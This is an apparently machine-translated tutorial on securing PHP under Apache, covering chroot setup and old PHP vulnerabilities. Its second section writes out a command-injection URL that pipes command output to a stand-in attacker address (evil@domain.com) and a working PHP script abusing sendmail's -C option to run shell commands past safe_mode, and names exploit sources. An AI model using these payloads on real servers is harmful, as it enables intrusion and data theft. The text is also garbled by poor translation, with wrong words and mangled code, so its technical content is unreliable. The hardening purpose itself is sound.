PHP environment Security Configuration tutorial

1. Web server security PHP is actually a module function of the Web server. Therefore, we must first ensure the security of the Web server. Of course, to ensure the security of Web servers, we must first ensure the system security, so that we can go far and never go. PHP and a variety

I. Web server security

PHP is actually a module function of the Web server. Therefore, you must first ensure the security of the Web server. Of course, to ensure the security of Web servers, we must first ensure the system security, so that we can go far and never go. PHP can be combined with various Web servers. here we only discuss Apache. We strongly recommend that you use the chroot method to install and start Apache. in this way, even if Apache and PHP and their scripts present vulnerabilities, only the banned system will be affected and the actual system will not be persecuted. However, the application of chroot Apache may also cause some trouble. for example, when connecting to mysql, you must use the 127.0.0.1 address to apply the tcp connection, instead of using localhost to implement socket connection, this is slightly less efficient. The mail function also sends emails as a title, because in php. ini:

[Mail function]
; For Win32 only.
SMTP = localhost

; For Win32 only.
Sendmail_from = me@localhost.com

All are for the Win32 Platform, so you need to adjust sendmail in the chroot environment.

II. PHP title

1. remote overflow

All versions below PHP-4.1.2 have the remote buffer overflow vulnerability in file upload, and the attack program has been widely spread, the success rate is very high:

Packetstormsecurity.org/0204-exploits/7350fun
Hsj.shadowpenguin.org/misc/php3018_exp.txt

2. remote service rejection

PHP-4.2.0 and PHP-4.2.1 have PHP multipart/form-data POST pleading to handle remote vulnerabilities, although not to obtain local user permissions, but can also cause denial of service.

3. safe_mode bypass vulnerability

There are also below the PHP-4.2.2 version of the PHP mail function to bypass the safe_mode limit to fulfill the command vulnerability, 4.0.5 version of the beginning of the mail function added the fifth parameter, because the designer considers that he can break through the safe_mode restriction to execute the command. 4.0.5 breakthrough is very simple. you only need to use semicolons to separate and add shell commands. for example, the PHP script edevil. php exists:

Perform the following URL:

Foo.com/evil.php? Bar =;/Usr/bin/id | mail evil@domain.com

This sends the result of id fulfillment to the evil@domain.com.

For PHP from 4.0.6 to 4.2.2, breaking through the safe_mode restriction actually uses the-C parameter of sendmail, so the system must apply sendmail. The following code breaks through the safe_mode restriction to execute the command:

# Note: The following two must not exist, or their owner is the same as the owner of the script.
$ Script = '/tmp/script123 ';
$ Cf = '/tmp/cf123 ';

$ Fd = fopen ($ cf, 'w ');
Fwrite ($ fd, 'Oss/tmp
Sparse = 0
R$ * '. chr (9).' $ # local $ @ $1 $: $1
Mlocal, P =/bin/sh, A = sh $ script ');
Fclose ($ fd );

$ Fd = fopen ($ script, 'w ');
Fwrite ($ fd, 'rm-f $ script $ cf ;');
Fwrite ($ fd, $ cmd );
Fclose ($ fd );

Mail ('nobody', '', '-C $ cf ');
?>

You must upgrade PHP to the latest version.

III. security configuration of PHP itself

PHP configuration is very mobile, you can use php. ini, httpd. conf ,. htaccess file (AllowOverride All or Options must be set in this directory). You can also set ini_set () and its specific functions in the script program. You can use the phpinfo () and get_cfg_var () functions to obtain the values of the configuration options.